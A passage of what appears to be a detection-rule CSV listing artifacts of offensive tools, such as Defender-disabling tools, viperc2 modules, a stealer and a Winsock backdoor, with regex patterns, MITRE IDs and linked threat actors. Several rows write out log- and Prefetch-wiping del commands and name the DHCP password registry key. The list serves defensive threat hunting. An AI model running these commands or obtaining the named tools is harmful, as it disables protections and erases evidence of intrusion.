Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40636"
"*DefaultBeaconApi*",".{0,1000}DefaultBeaconApi.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","40637"
"*DefaultCreds-cheat-sheet*",".{0,1000}DefaultCreds\-cheat\-sheet.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","N/A","10","6048","726","2025-04-15T13:13:19Z","2021-01-01T19:02:36Z","40638"
"*DefaultListenAddr = "":7448""*",".{0,1000}DefaultListenAddr\s\=\s\""\:7448\"".{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","0","#content","default port","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","40639"
"*--defaults-torrc*",".{0,1000}\-\-defaults\-torrc.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","40640"
"*defc2b9e497d0fc59383dae3ae2bba2780be242d862ab6d44a5f7e0797ed9e6a*",".{0,1000}defc2b9e497d0fc59383dae3ae2bba2780be242d862ab6d44a5f7e0797ed9e6a.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","40641"
"*DEFCON-25-Workshop-Ruben-Boobeb-UAC-0day*",".{0,1000}DEFCON\-25\-Workshop\-Ruben\-Boobeb\-UAC\-0day.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","40642"
"*Defeat-Defender.bat*",".{0,1000}Defeat\-Defender\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","40643"
"*defeat-defender.py*",".{0,1000}defeat\-defender\.py.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","40644"
"*Defeat-Defender-V1.3.ahk*",".{0,1000}Defeat\-Defender\-V1\.3\.ahk.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","40645"
"*Defender Control v2.1 - Author by BlueLife*",".{0,1000}Defender\sControl\sv2\.1\s\-\sAuthor\sby\sBlueLife.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40646"
"*Defender.Remover.exe*",".{0,1000}Defender\.Remover\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40647"
"*DefenderCheck*",".{0,1000}DefenderCheck.{0,1000}","offensive_tool_keyword","DefenderCheck","Quick tool to help make evasion work a little bit easier.Takes a binary as input and splits it until it pinpoints that exact byte that Microsoft Defender will flag on. and then prints those offending bytes to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.","T1027 - T1055 - T1562 - T1553","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/matterpreter/DefenderCheck","1","0","N/A","N/A","N/A","10","2431","436","2023-09-14T18:42:39Z","2019-04-09T14:03:46Z","40648"
"*DefenderCheck.exe*",".{0,1000}DefenderCheck\.exe.{0,1000}","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","N/A","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","40649"
"*DefenderRemover.Phase1.exe*",".{0,1000}DefenderRemover\.Phase1\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40650"
"*DefenderRemover.Phase2.exe*",".{0,1000}DefenderRemover\.Phase2\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40651"
"*DefenderRemover.Phase3.exe*",".{0,1000}DefenderRemover\.Phase3\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40652"
"*DefenderRemover.Phase4.exe*",".{0,1000}DefenderRemover\.Phase4\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40653"
"*DefenderRemover.Phase5.exe*",".{0,1000}DefenderRemover\.Phase5\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40654"
"*DefenseEvasion_CodeSigning_PeSigningAuthHijack.py*",".{0,1000}DefenseEvasion_CodeSigning_PeSigningAuthHijack\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40655"
"*DefenseEvasion_CodeSigning_StolenMircosoftWindowsSignature.py*",".{0,1000}DefenseEvasion_CodeSigning_StolenMircosoftWindowsSignature\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40656"
"*DefenseEvasion_ProcessInjection_CobaltStrikeOnline.py*",".{0,1000}DefenseEvasion_ProcessInjection_CobaltStrikeOnline\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40657"
"*DefenseEvasion_ProcessInjection_CsharpAssemblyLoader.py*",".{0,1000}DefenseEvasion_ProcessInjection_CsharpAssemblyLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40658"
"*DefenseEvasion_ProcessInjection_CsharpAssemblyLoaderPlus.py*",".{0,1000}DefenseEvasion_ProcessInjection_CsharpAssemblyLoaderPlus\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40659"
"*DefenseEvasion_ProcessInjection_ExampleModule.py*",".{0,1000}DefenseEvasion_ProcessInjection_ExampleModule\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40660"
"*DefenseEvasion_ProcessInjection_PeLoader.py*",".{0,1000}DefenseEvasion_ProcessInjection_PeLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40661"
"*DefenseEvasion_ProcessInjection_PowershellRunInMem.py*",".{0,1000}DefenseEvasion_ProcessInjection_PowershellRunInMem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40662"
"*DefenseEvasion_ProcessInjection_ProcessHandle.py*",".{0,1000}DefenseEvasion_ProcessInjection_ProcessHandle\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40663"
"*DefenseEvasion_ProcessInjection_PythonRunInMem.py*",".{0,1000}DefenseEvasion_ProcessInjection_PythonRunInMem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40664"
"*DefenseEvasion_ProcessInjection_SessionClone.py*",".{0,1000}DefenseEvasion_ProcessInjection_SessionClone\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40665"
"*DefenseEvasion_ProcessInjection_ShellcodeLoader.py*",".{0,1000}DefenseEvasion_ProcessInjection_ShellcodeLoader\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40666"
"*DefenseEvasion_ProcessInjection_WindowsSystem.py*",".{0,1000}DefenseEvasion_ProcessInjection_WindowsSystem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40667"
"*DefenseEvasion_SubvertTrustControls_CloneSSLPem.py*",".{0,1000}DefenseEvasion_SubvertTrustControls_CloneSSLPem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40668"
"*define BACKDOOR_PORT *",".{0,1000}define\sBACKDOOR_PORT\s.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","0","N/A","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","40669"
"*define DHCP_KEY _T(""SYSTEM\\CurrentControlSet\\Services\\DHCPServer\\ServicePrivateData""*",".{0,1000}define\sDHCP_KEY\s_T\(\""SYSTEM\\\\CurrentControlSet\\\\Services\\\\DHCPServer\\\\ServicePrivateData\"".{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","0","#registry","content","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","40670"
"*dekrypted/Fentanyl*",".{0,1000}dekrypted\/Fentanyl.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","N/A","10","","N/A","","","","40672"
"*del *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*",".{0,1000}del\s.{0,1000}C\:\\Program\sFiles.{0,1000}\\TeamViewer\\TeamViewer.{0,1000}_Logfile\.log.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","40674"
"*del *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*",".{0,1000}del\s.{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\AnyDesk\\connection_trace\.txt.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","40675"
"*del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\\\Microsoft\\\\Windows\\\\Recent\\\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40676"
"*del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\\\Microsoft\\\\Windows\\\\Recent\\\\AutomaticDestinations\\\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40677"
"*del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\CustomDestinations\\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\\\Microsoft\\\\Windows\\\\Recent\\\\CustomDestinations\\\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40678"
"*del /F /Q %APPDATA%\Microsoft\Windows\Recent\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\Microsoft\\Windows\\Recent\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40679"
"*del /F /Q %APPDATA%\Microsoft\Windows\Recent\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\Microsoft\\Windows\\Recent\\.{0,1000}","offensive_tool_keyword","del","del command used by Anti Forensics Tools","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40680"
"*del /F /Q %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40681"
"*del /F /Q %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\.{0,1000}","offensive_tool_keyword","del","del command used by Anti Forensics Tools","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40682"
"*del /F /Q %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\Microsoft\\Windows\\Recent\\CustomDestinations\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40683"
"*del /F /Q %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\*",".{0,1000}del\s\/F\s\/Q\s\%APPDATA\%\\Microsoft\\Windows\\Recent\\CustomDestinations\\.{0,1000}","offensive_tool_keyword","del","del command used by Anti Forensics Tools","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40684"
"*del /F /Q C:\\Windows\\Prefetch\\*",".{0,1000}del\s\/F\s\/Q\sC\:\\\\Windows\\\\Prefetch\\\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40685"
"*del /F /Q C:\\Windows\\Prefetch\\*",".{0,1000}del\s\/F\s\/Q\sC\:\\\\Windows\\\\Prefetch\\\\.{0,1000}","offensive_tool_keyword","del","del command used by Anti Forensics Tools","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40686"
"*del /F /Q C:\Windows\Prefetch\*",".{0,1000}del\s\/F\s\/Q\sC\:\\Windows\\Prefetch\\.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40687"
"*del /F /Q C:\Windows\Prefetch\*",".{0,1000}del\s\/F\s\/Q\sC\:\\Windows\\Prefetch\\.{0,1000}","offensive_tool_keyword","del","del command used by Anti Forensics Tools","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","40688"
